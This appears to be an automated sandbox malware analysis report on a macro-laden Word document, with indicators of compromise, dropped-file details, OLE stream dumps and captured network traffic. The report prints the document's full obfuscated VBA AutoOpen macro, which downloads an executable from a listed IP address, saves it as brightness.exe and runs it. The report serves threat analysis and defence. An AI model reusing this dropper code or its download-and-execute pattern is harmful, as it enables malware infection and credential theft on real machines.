Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, e26769.dscb.akamaiedge.net, nleditor.osi.office.net, uks-azsc-000.roaming.officeapps.live.com, prod-eu-resolver.natur
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:59:24	API Interceptor	114x Sleep call for process: brightness.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
166.62.27.188	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	amazonenviro.com/245_Aiymwhpjxsg
166.62.27.188	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	amazonenviro.com/245_Aiymwhpjxsg
147.124.216.113	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	147.124.216.113/image.exe
147.124.216.113	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	147.124.216.113/albt.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
amazonenviro.com	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-26496-GO-DADDY-COM-LLCUS	https://jmak-service.com/3225640388	Get hash	malicious	HTMLPhisher	Browse	107.180.119.1
	https://www.google.com/url?q=YG2GERTSbxgfeaGh1Yi5pby8yODY0MDkxOTEyNjI3MjNkMzQzMGNlYjE1ZTRjZjNlZWUwMTM5NGMyMDk3MmRmYTllZTBkMzUzMDBlZDFjOWNjMjdhNWZiYmM0OTU1ODkzMjEyMjI5MjAwOTkviinbsewtyuas53D1e4a0cefd8db4ad28e54c10117f7d498%2526i%253DNjI2YjE3MTBiZWI4YTgxMWUwNDIxNzE3%2526p%253Dm%2526s%253DAVNPUEhUT0NFTkNSWVBUSVYmhcLGCIsQzpMqHgYCBBo2kwEPWKEfFaahaLsnpofO4A%2526t%253DM3dHV0ZCT2t4azAvRVhKQ3B1ZC95RFFTdmpSMCt3cEFxWHJocUMzM0EyZz0%25253D%2526u%253DaHR0cHM6Ly9tLmV4YWN0YWcuY29tL2NsLmFzcHg_ZXh0UHJvdkFwaT1zaXh0L&sa=t&url=amp%2Fdlocumndjkacheckckoqingnmlcsoftlineon-secure-portal.us-iad-10.linodeobjects.com/newdocusign.html#Tdcjoiletuzn43fqnlhtwn8dbfakjhsdbfjhasbdfkjasbdkf%20ashjdbaksdbfkjasbdbfad	Get hash	malicious	Unknown	Browse	208.109.228.27
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	fuckunix.arm.elf	Get hash	malicious	Mirai	Browse	50.62.7.191
	Josho.x86.elf	Get hash	malicious	Unknown	Browse	72.167.237.175
	DRlFlg7OV8.lnk	Get hash	malicious	Unknown	Browse	166.62.28.147
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	192.169.229.195
AC-AS-1US	Payment Swift CopyMT103.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	147.124.212.172
	Customer.exe	Get hash	malicious	XWorm	Browse	147.124.210.158
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	147.124.216.113
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	147.124.216.113
	ppc.elf	Get hash	malicious	Unknown	Browse	147.124.39.73
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	65.217.170.6
	scheduledllama.exe	Get hash	malicious	RedLine	Browse	147.124.222.241
	i686.elf	Get hash	malicious	Unknown	Browse	147.124.15.84
	5r3fqt67ew531has4231.m68k.elf	Get hash	malicious	Mirai, Okiru	Browse	147.124.15.46

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$j1wg0cM2.doc

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.731791025358267
Encrypted:	false
SSDEEP:	3:KVGl/lilKlRAGl3p0DV10QPlfll+7wnN+RP2D:KVy/4KDlpcV10QoEN+RA
MD5:	504196959B980CC39FFB8B36C5BCBBF5
SHA1:	E28FB579FCCB3095B4BCDFC57E03BE9B555F12D5
SHA-256:	860F93F61D62705B805B2FC1591C05C78153B591E099FBB3DD94FFB249B28F27
SHA-512:	2361C26C51F752C6CF240AAB588FEFFAE97EFA92F0FFC189DF30379549C9986AEE0BF2F4428491A98EC1071E5B4105AA6069A80818745FF8F5DD080D7C4393C4
Malicious:	false
Reputation:	low
Preview:	.user..................................................j.o.n.e.s...3.`.......s......P.u..a.i............................................W..\|$..}..i.........=.i

C:\Windows\SysWOW64\brightness.exe

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1161216
Entropy (8bit):	7.188493218292404
Encrypted:	false
SSDEEP:	24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
MD5:	483AB6BD562B28782D0999ABEC4F57F5
SHA1:	B758556AF2B98708B97A6C3BDBD1E9F2905ED690
SHA-256:	E5393C34240B7E1B8A35052D7E151C324A4AA6424B5A6E1A45717157042FB9AB
SHA-512:	6F3F60153B3C4B1A780C80D59A4E17D8C109F57A1380F73B50498AC85A081B804D0F7C0FFADE4AC193656B3135DEDDDCD607121D9571B4C3BAF34103E36D129D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 75%
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................@...................@...........................P..n&... ...........................\|..................................................TW...............................text............................... ..`.itext..H........................... ..`.data...@........ ..................@....bss.....6...............................idata..n&...P...(..................@....tls....4................................rdata..............................@..@.reloc...\|.......~..................@..B.rsrc........ ......................@..@.............@......................@..@................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: GRACE, Template: Normal.dotm, Last Saved By: GRACE, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Tue Jan 7 08:57:00 2025, Last Saved Time/Date: Tue Jan 7 08:57:00 2025, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Entropy (8bit):	7.058184259014953
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	zYj1wg0cM2.doc
File size:	146'944 bytes
MD5:	3db6baf168cecc916012a59b6530175a
SHA1:	7d74c680b09f982271a50483ce350a5b3d9a0996
SHA256:	96882b077a607f34cd963461341d728982e2075ffd4891f1b91e915da904cfe0
SHA512:	5a4b22f622559b8db815b1dc8cfa206eb433e55541de7d2540bd786703a0a418d03d1b657bcbdf9ceff74c863a1c7e4d324e3a555fd66d0905034ccdf5d677c5
SSDEEP:	1536:F7dgmjjy2lQkySTUb2roegTK+g9WomfaQjSqttJnkL5mS9kBwNR42qe3/w:FZPjbTU+J799IjSqtteL5N9kBF27
TLSH:	AEE3C447A9458B43E03493B5BE435FAD2F197E0CA9866AEF11273E9B3D302324D4E16D
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	35e1cc889a8a8599

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "zYj1wg0cM2.doc"

Indicators

Has Summary Info:
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Title:
Subject:
Author:	GRACE
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	GRACE
Revion Number:	2
Total Edit Time:	60
Create Time:	2025-01-07 08:57:00
Last Saved Time:	2025-01-07 08:57:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	1
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Document Code Page:	1252
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	983040

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 4808

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	4808
Data ASCII:	. . . . . . . . V . . . . . . . . . ] . . . . . . . . . . . . . . 8 . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h .
Data Raw:	01 16 01 00 01 f0 00 00 00 56 05 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 5d 05 00 00 81 0f 00 00 00 00 00 00 01 00 00 00 38 20 08 6e 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
 
Dim xHttp:
'this is a comment



Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")
'this is a comment
Dim bStrm:
'this is a comment
Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")



Dim nirm1
nirm1 = "h"
Dim nirm2
nirm2 = "t"
Dim nirm3
nirm3 = "t" & "p:/" & "/147.124.216.113/image"
Dim nirm4
nirm4 = "."
Dim nirm5
nirm5 = "e"
Dim nirm6
nirm6 = "x"
Dim nirm7
nirm7 = "e"



Dim plpl
plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7

'this is a comment
xHttp.Open "GET", plpl, False
xHttp.Send




 
With bStrm
 .Type = 1
.Open
 .write xHttp.responsebody
 
 'this is a comment
 
Dim monu1
 monu1 = "brightness"
 Dim monu2
 monu2 = "."
 'this is a comment
 Dim monu3
 monu3 = "e"
 'this is a comment
 Dim monu4
 monu4 = "x"
 'this is a comment
 Dim monu5
 monu5 = "e"
 'this is a comment
 Dim monu6
 monu6 = monu1 & monu2 & monu3 & monu4 & monu5
 
 
 .savetofile monu6, 2


Dim parveen1
Dim parveen2
Dim parveen3
Dim parveen4
Dim praveen1
praveen1 = """brightness"
Dim praveen2
praveen2 = "."
'this is a comment
Dim praveen3
praveen3 = "e"
'this is a comment
Dim praveen4
praveen4 = "x"
'this is a comment
Dim praveen5
praveen5 = "e"""
'this is a comment



Dim praveen6
praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5
 


End With
 
Shell (praveen6)
 
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.235956365095031
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	0.24379920956187054
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	0.46196969653588177
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G R A C E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 7019

General
Stream Path:	1Table
CLSID:
File Type:	data
Stream Size:	7019
Entropy:	5.867058948447899
Base64 Encoded:	True
Data ASCII:	. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
Data Raw:	0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: dBase III DBT, version number 0, next free block index 113648, 1st item "TRC", Stream Size: 113648

General
Stream Path:	Data
CLSID:
File Type:	dBase III DBT, version number 0, next free block index 113648, 1st item "TRC"
Stream Size:	113648
Entropy:	7.649737008358478
Base64 Encoded:	True
Data ASCII:	. . D . d . . . . . . . . . . . . . . . . . . . . . / = ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . s . . > . . . . . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . R . . , . . . . Z . . 7 J 2 9 ( . . . . . . . . D . . . . . . F . . . . Z . . 7 J 2 9 ( . . J F I F . . . . . . . . . I C C _ P R O F I L E . . . . . . . . . . . . . . . m n
Data Raw:	f0 bb 01 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 2f e0 3d 60 03 ca 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 70 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 73 00 0b f0 3e 00 00 00 7f 00 80 00 e1 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 372

General
Stream Path:	Macros/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	372
Entropy:	5.247850066443211
Base64 Encoded:	True
Data ASCII:	I D = " { D 4 8 8 9 9 2 A - D A 8 5 - 4 B 5 A - 9 B F 1 - 3 D A F D 4 9 5 8 A 0 9 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 E 1 C 1 1 2 9 1 1 2 9 1 7 2 D 1 7 2 D 1 7 2 D 1 7 2 D " . . D P B = " 2 0 2 2 2 F 3 0 3 0 3 0 3 0 3 0 " . . G C = " 2 2 2 0 2 D 2 D 2 E 2 E 2 E 2 E D 1 " . . . . [ H o s t E x t e n d e r I n f o ] . .
Data Raw:	49 44 3d 22 7b 44 34 38 38 39 39 32 41 2d 44 41 38 35 2d 34 42 35 41 2d 39 42 46 31 2d 33 44 41 46 44 34 39 35 38 41 30 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41

General
Stream Path:	Macros/PROJECTwm
CLSID:
File Type:	data
Stream Size:	41
Entropy:	3.0773844850752607
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2910

General
Stream Path:	Macros/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2910
Entropy:	4.347263611919823
Base64 Encoded:	False
Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
Data Raw:	cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/dir, File Type: VAX-order 68k Blit mpx/mux executable, Stream Size: 522

General
Stream Path:	Macros/VBA/dir
CLSID:
File Type:	VAX-order 68k Blit mpx/mux executable
Stream Size:	522
Entropy:	6.254646838582843
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . 9 . i . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * , \\ C . . . . # m . . A ! O f f i c g O D . f . i . c g
Data Raw:	01 06 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 39 c8 8f 69 08 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: WordDocument, File Type: data, Stream Size: 4096

General
Stream Path:	WordDocument
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	1.0819123923304879
Base64 Encoded:	False
Data ASCII:	. Y . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j [ [ . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . \\ 9 . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G . . . 0 . . . . . . . . .
Data Raw:	ec a5 c1 00 59 e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 5b c9 5b c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 39 a3 0a 5c 39 a3 0a 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 08:58:46.946928024 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:46.952003956 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:46.952094078 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:46.952234983 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:46.957036018 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.577908039 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.577927113 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.577936888 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.578007936 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.578016996 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.578022003 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.578077078 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.578454971 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.617119074 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.617173910 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.617203951 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.617254019 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.617285967 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.617320061 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.617331028 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.617331028 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.617547035 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.617780924 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.617851019 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.617949963 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:58:57.668498993 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.668513060 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.668523073 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:58:57.668615103 CET	80	49736	147.124.216.113	192.168.2.4
